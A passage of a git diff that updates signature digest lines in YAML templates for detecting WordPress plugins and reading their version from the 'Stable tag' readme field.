b/http/technologies/wordpress/plugins/gutenberg.yaml index 20b65e38b8..e480ca1c68 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100f89c22fbb092fe88ea4820c01227307cddf7e021ee5cd1df4e38325ced5440c4022100bafb8678867c12baa3001d43090b4859bfe53633fbabe6bb4b5bbd37aaec50b0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b6bd340e39fc1a7dbe6b0f25fbc30ca6af9b53652541ef089730485f2070cd6e02210091b18b5d1783eaf9c6814ac85e5f7be691fd003261f192753492eccfaf1a6bcc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index f9d911d503..d54dbe7a75 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450220758670388c344b04bdc2a8e26fc7dd27e1bd3c53bb72efde84bb97867c5ed726022100f6ad80219ebee0e668fa2973b8912ad3645c9f66e30f909b508c16f5ac4b3be1:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100baa53bbc32d15d66beeabb5b58575b31f4ad7a594dac5aeed24d19dcdb2a0d15022100a0a89dee20a47b8de13b661d63586c9fe47fcfb2565a7372a0e1f14b9e594c8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 5e455f73ce..dfb80dad43 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210081ed75233280330db434594ed985f7b1b99a7c43d6db94aef315cb37995fb91f02201e991b7de8a4bea9d05d1508d3796b4d65afcf8a59902215494ecf0d574cd4b6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cc39f5ddbacbaaf9d194c751c3eba9150deb5d87821b9b85c7b9a83485e732d402207fb9123e569f209f3a7a69cebdfff24469aac3609596d829827c40a56e60fe45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 58698ed61d..1ca4d52db2 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022050f11bb9902555a938cf0a79e7d706e117f106299367af51db958e012912f18f02201dac579a092e03039db2919a8da1e8bc93c78f057e60cc9c9e9ed8f713319d29:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022046d3cfc78d057642f5b8e1dd7e38050713cd4c752d22081dcdf62537cf434a6c022100e691faacd2e02a10a958cdb1bb1cc9fbb375621fdf12c68ad5a485b315b4bc16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index d16a62c3ef..125c91fe1a 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100b4ccfe925c0cc49c098a4139a83f9012ca999afdb667e297dc8a36565f217e7e022100cb872fbfdb4940a2b6503bc04c2e9d2455412115e0abd53e14496131fffcfa70:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100daaac622632b8d760865c59ff9b0d00884a0f4f2c36e67976b30546970bfd638022100dc037f6cfe18094f0818d4c9275efa601e06336c70d2f8ab369d748e705d65db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 66363389d0..e3efa9d0b3 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205a5d630d99424bd42567a9aa82d5e668a919f50573f07db06684411e7499819402206210c10a5a28442321ea95135be32e27a988587bd8c5db984c8331bc84c00907:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204fdb63e3efc63b818116e434a0e88f6236b84484c1c153178e1ba46dc94d6417022100c401fcc8af9823bd46688015c297f830a72fdbf66d01723df8f0ba8bc4141181:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index 8a70b2d7c4..31292b5bbb 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022008daf9fa05f43df9ab85272965a1d9e7174e37549c49d7c8d9dd4f4d0badd300022100c7811460a3e6c18109edaa52ab9b075facf4e678e226d769e3c4d8e80935c9c6:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402202356ee6f0afb70c458794b911123343d1d09a02ee0423dc379954aed530317800220115cbc70316fcf7930e42aa7cc91e4b2a4b92d7d15de38b25bde570b636f2bc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index c014671087..9bd4c5cfec 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008cb47ed1163e4cf00272505ce79041b10f58d86583be3a3392c94ce6405d7c9c02207677b87550638ab9de3eddffc0d74a86928ce7eb8259275fb14de89e27b077a4:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205bc7765541ae07ee407841aa6e59590863758c7250a8eaad85e1f99e8f6486ea022100a9d02cfa4d1f31e7b85fdc67f2964d0e61b8d2b28eca51e68d2dc85efbf11dab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 3f1ed8ac30..70fd828c6a 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022039cbbdb9ce6584cc516ca076bc3a638d3a0e0b484fb6f05f524f980c83722add022100c361e63ad0a72a132711e6c586b1bfc5b10a3704ae5d378e809ac6d2af4456da:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dfa7d7acfe4cf69d813a0ff19eb04fbaa6af739f5ed5b3c91793a8a5c8e45625022100b873b0e727610dc375fe58c63ee7eb0ee1cf6dfaf740b8d4a6b9c938cfc90477:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 69685c1b7c..65df528f20 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100d2b08c496917202db2dc5d6cc76788c3a091eb1de8ee8579046a5ad5f8237b34022025d45a3ec69a114be9de0be9d739ddd0112f9ed9090b8167f354b2b7bc262447:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f3a0f90bf76a61a60e4fd7d25c7106eaaf7de6b1852768a704e817fe6d623e2d0221009966383a54fb6c7cd37c526f2a1c0fc32d85a5dedb52e9195e4b7d0fee9cae3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index ea3bc2af3e..6531f86eb6 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100827112cc01ee159ef70fb8c1ea79cea140bf63793cf831073dcca5f5670b9ee2022100d0a3ea05ead6fa7a362a7e7532db2dd76397e41851cc18e4909900f83da6dbf7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f50bdb77bf314e1c0c280beeae3b7e3960f8bed9ccf2fa78f509e402e99b9340022100aeb597b8fa42b68882c6c9eb27164912100e5b9a18accf5ba561a9b26bc052a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index d81b8b6240..94ae158bda 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100fd25a37f43bdd8db268439079c0008b20fed95e48185bc04906e3e17c52de085022005940a364ab9f27e340c0b89e0daed746253fd319380281036d0b83866ceb7a9:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f6c6d2c0f9ab0d84e796cbd9c07ffc9c349d2bf294ca92e24d768d2c3634b2dc022100b78d13dc1224a6b002c720ae62279b23bff2927ca0e06709a905a948ef8701fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 373f6f2809..543d94e953 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100e48d3d8b47799fe4487c94daf57163d1283b80e0017bfacd677bdac7a2a6bddf022100b87f78a6959f719eeca562868a06f2d5659aa2d73c5fb9d67e11adea16d521b3:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200259f82c75798a6412b6ce5ec403f18348e8188956fb1733ed76bb107f3c06bb0220404d96b28e50aeb7fba0885058198c2488cb52709fc961d66df5d932084b2e16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index f7171226f0..b018bca347 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a004630440220136e79db0d217ee2858ed8c1d5675d6a4871003996590bb204abd22f332f61ea022015d1c228ec8aea6a28d2a8c8fe5bce694eae10b39e69ba0258646ab654f6522b:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204521e7e36dff2bb7325f114caa1e4706b53649661943ec82de9e014ed6dc8db6022020c0af08e24d06dbfb60022c2707e82fb17e4886b30290d000ab9ec566c7a623:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 2f01b0dfa2..e8d2aabb95 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b797811f797adfe6c8725536e01912d9ae5d9a6e1540286360d345f85d27d18e02202ae80b3220814827150fa586594accf015a311f89d73bc40216210355da1fb18:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dff9b549b31add4b73eca2c8ac57432b1b84ab62aa74de401720c34c159071a0022100c3a54da76617e4f54f126e5c627badc0d296ea46cf11adb4fa53c437ec7d8456:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index a2406d3dab..981ac849bf 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a004830460221008fac30cf48dbc20a146a6e7742cd8ce222c81c7db934f2f82d7faf36018720bb022100c19ba4940f2f6e153a46cc7175132e99027394bee8f28245de0c898eb3e4ffd8:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100865b12d5529e676ac5cc96ec32e66080e7c148cee5af85007104f340b6eb3fce022100ef320089dd24c9304f0f67b289118102d82da02140c68ce8accf8d7d6649297e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index 89e1c48335..ec771722c3 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402202cab0c7bd9d2b3a072433d145a80d719e259ddd8faf24c1c1dc316d0ed3db1da02201694771594dee9fbd51e20b6419728869d0f4ba3be57549f719e7c8d9d994642:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402204f0bf38967d39de683ba536413e55bbbb551471ca9f67d39eeafad5ee7fe494a02202efba34634cb6d8c15062667945bf46cb52d712a22b17b9bd35a2acd3034e5bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 3453d7a0b4..25f2e14f46 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022001a0ec051dd1af618e988ea43b124a1dc0484d32e6277e5dc1f1597c20a136ed02201c8755b7d3608b285dc2e1e834f626250f84954698182f3db4b681483d08f301:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a728544590a54e4c0d7f3ca04b90f87d3d14260aa5785a743e87719991b4517602210092d3c3db0468ff0ed3574c2a5287cdea813b209713f9c2562fcd8eaea411113d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 6485799437..669b7de7f2 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4b0a00483046022100bb9deb10dd386c70ec00dd951e51b27685049a78bb3ed3f294ca51ead6d8c309022100d30bd379a357430ebac3fd5a0947d947b7c02a966eec6f630d43bef11959965b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502200488771ca969b1a90d9b856ca6ba79b25c450be93e67b304e23ebc4bdd7c4ed80221008b654ce470fdc52be393e32c6d8d8935b28eb880dd3af92a0e5740fce54a218d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7dca1baf60..deaf1a442e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022023748f776e321fdd32b40c3941b40bd7ca1288b97dc691cc64dbf5ca380bf742022100bef9efec333f585ef8e3302ca9db7d5067ce595009e32096ed1dda599426beb4:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e54dff39a13d2f6af10874dbf32b8a4de23645e703d73bfb139dc0aa6b9d5918022100ec3d454925ddff9d060a2b2cc6a1015e477e595f2c9e0325f66317c852239593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index d07bd0ea6e..ba5bf32aee 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502204a0823d5c8c6f7ff9f9fa4aea43dd55b16271a18b9f8baf524d83b09839ff884022100b2c009aef3a1db07cdd78654cdb598ce6dcfbe888f31412451ad43da8236bdcb:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b63350a65be4d4bc78d44c28f099d2a3c0ae7f02ef7ddc0d0c6cdfab1e493d8d022100b823855f22d158b1111a027ff32f10de25b413b96202a26357430b689458e058:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index 17d4480465..1c15086129 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402205d93c18fdef4692ba05238b13ea390f4036d735dcb09c444a2b6235cbb76bb2302207bc3f5e2851d2612c0b929c6ae92f2443b4ddf87c480a6e6130a0d29556c1c61:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022079447ad5b55dc9251ebb8b4cc0466182e196a5e04e774c128a94d1e924d05ee802202efcbd26e295f94e2f5edba5e55f3c67b9ceb6ac0812fcf443fbfe56284de8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 4794ff35a7..e6ce7017cc 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502201ebcad1f27a3d493e1a4e4df3feeef3387ca7b96687b4537f60ac18060c0caf3022100ead072da01ed0bb545a105fcac8ca1321637aa3240feed6b596708c9d729f7a2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b0c59dc3956de567dfd76996b475e68dae55636bc48090bda3828744a693ef870221008a77e6a139daddccf5bd998486079e9246dd55578f5de0b98b9771bbfe0e8aa8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index d05d20c7b1..e54b0dec71 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502205b8059573901b2423f6e28a4343466892956194f967e6bfe092bd3a250e22a13022100cddd413ea12ebf4c620d295954f3126a86eee7edcff3cf8fd31a2f0ba92b0a05:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e7193dca2ace984f35fbcf6c94e52248575966238724077f72dd2ba07a56ca68022052df65901e9ed3a55521fb81b33b725d65348ea8f5aa566fa887d47e7aa78ba8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 16e8952295..4fdd5f2822 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100c4434653fec3122e237f6655138067ca66f716174faeb43190f1861be9214c8d02201d3cf5555f209045e57e08fbd49fe0d85ebb04206e3afbd1d24c7ec5ef846b98:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100a2d7cf11b2b0bab294862239097a0da08c798e74a9f1c17ae76b2426be04040f0221009fb7b94b0b4bebe862fc73bc869af2822cbfdd6b13061b168b5855161e76aeec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 539fc850bc..caa6e94126 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a004730450221008f4ed59f155a0dfddcfb8e4eea942e24b7027f1f1d53181c6306d235a552c4ea022009391d5f9d923ff5981e9aa24c7528af370e0e4f04e0e63b8becaa23d553357a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100938c837c07d4a7cab1d12be105196be35f5344427a29644eff8c0afba085b4c202200c39c249948fa80ae207c5dce5bc506f6447163711e998caf59e8a87256c6ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 4727acc26f..dfc6052a78 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100a9cd128b85067a0d6aa2d2e725c96b774f062760802ddb24e2a81a5b5123b4bd02201badc787e10865893db558855637ee50ed9d7511188080f0d27b0ac698705ee7:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220291254f093c09fe05ea1bfc4813d5280218f54bd3526008f17aedc9304074de402205fe47e21cc3c5f4126e039fcba6b3b6250ae44005c1918e7ae8c1dd5f2a1c6c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 141026b8d2..c97fb2ea86 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022100b5307d57967a09160689ed28d73191f5582f31e8bee0651ad6a9790c53aeef9e0220206459e9faa433275889fe7e057e5328309b5a348a92a4a157447cfe3d9cd636:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220630f07260ab1e12055f9cd127fae8172181d3bcbf2c65ecca2b07cede469c888022060d49acd15730b7973a243a4e8b50a11bb6358af6dfe90f51167f352014fbdbe:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index bcebb3967a..8f1f7a2bc5 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402203c347b7750a618aa9a1561fb5451fed2c412845e0634fab12a7aa4cff8d8f55202204b8cc7525ea17e8cd5f2a98d19143a9a84844c9043a43f293535183d4e8dc712:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e3968d9ca1f7806b9f96a10b968500b26eb0d1c4b4c591b85bbf1b3000f68a7f022100c50239cb1d3ee3cefa14ab2f7c34c8237ad6979c1d97e04788294d24ab13f01e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index fdd8356271..ca58fa23ea 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a0047304502210084922acc5025100fb11fa6053f33270a1ca6e8b32ddad49864a2eb2efc6fc2f6022061e6474fecf2cde65f7a0bf1fb5fdc464fb30b915fcaa6c01e3487dda0aa5e90:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022062c238f9d25ec2bb6fe643e8856a02fd1c325a945af49c3ef851ad6bee04a54802210089c453728ea63d4e06db846fc68198e377a423858a47d1ee5298f6ccb5369bf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index de03e2579d..1fdede4a07 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022032a68524a4e9bf06a7a6b120b4a7a86995205fd34176e60caadfe8cfcc98016d0220667b16d29b09e8a8dc77981370f471e5a7cff9f58e9a5b5eb3fe76e70fff7dbd:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402206a76399d0712943253e76ba19c8214cdf870130656e415d48b5c5b1cf0f2af6302205a1b25427ce403e7af47b391209c4b3c2398fb68d6e0235952ff8eb87d5638de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index e8f6cc5185..f781c33107 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a0046304402206fcee3416bdbd6348cd3a0860b4259838fa8da84de9bf94865140f5809024eff02205800cfdc47d50b1210141882b4ca6b6c51592c2de1dec061c7a01b0c091ef05c:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100af52fd7a72ce25a2239926f5d396a6b6692f0b518caebebfab4f8fc1274b8eea022024551bc875f68d90c916b051eeb2e3ddc97cf88eae13aa0b291fe31ea459b18c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 869a3981da..6d6291c4cf 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 4a0a00473045022044318c7e25980d3fef802f78e44c57d962ed967bfc2ecb1f2248b19afb8889d7022100c2b355d69b007a8d39182a42cfca66c0de9f98620ea2e6ca0f522d0c6c4c8b53:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022023b0d10b7a4377c34453390e8b40c418ebc0593cf1d22860fd2c5bf3a0a7c2c1022100df02595c157a397bc56adc54615dde05aecd926fb08cd94744ad631e8352a0f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/metform.yaml b/http/technologies/wordpress/plugins/metform.yaml index 4868738110..016734bc42 100644 --- a/http/technologies/wordpress/plugins/metform.yaml +++ b/http/technologies/wordpress/plugins/metform.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 490a00463044022002151935b96398d2fa2b3dddad288158ae80db0d62a8338651b8e6ccf011a17d02206fe03cfa36ce322e0fabe7903f5f92aaf6f71b7cb224b7e7802cc4195bf236ec:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022007898e6ec0022ab8573b685775b95e4cda670e0233837f36689c5c1cbe6267580220697d47229dfa02d4f338bf1eb97ad6e8408803e38f99b334e19f4e747907c7d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index 08ccf10367..2de2874047 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -47,5 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' - -# digest: 